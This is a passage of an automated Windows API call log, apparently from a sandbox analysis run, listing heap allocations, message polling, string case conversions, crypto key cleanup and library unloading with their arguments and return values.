(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.102] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.102] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.102] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.102] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.104] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.104] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0252.104] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0252.105] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.105] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0252.105] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.105] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0252.105] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.105] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.106] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.106] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.106] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.106] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.106] CryptDestroyKey (hKey=0xaa58e0) returned 1 [0252.106] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0252.107] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0252.107] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0252.107] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.107] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.107] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.107] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.107] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.108] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0252.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0252.108] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.108] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.108] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.108] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.108] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0252.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0252.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0252.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0252.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0252.108] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0252.109] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.109] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.109] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.109] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.109] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.109] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0252.109] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.109] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0252.109] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.109] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0252.109] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.109] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0252.109] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.109] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0252.109] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.109] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.110] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0252.110] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.110] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0252.110] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.110] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.110] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.110] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.110] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.110] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.110] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.110] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.110] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.110] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.110] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.110] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.110] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.110] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.111] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.112] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.112] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.112] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.112] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.112] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.112] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.112] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0252.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.112] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.113] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0252.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0252.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0252.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.114] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.114] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0252.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.114] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.114] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0252.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.114] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.115] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0252.115] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0252.115] FreeLibrary (hLibModule=0x74d40000) returned 1 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0252.115] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.115] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.116] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0252.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.116] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.116] HeapFree (in: hHeap=0x25c0000, 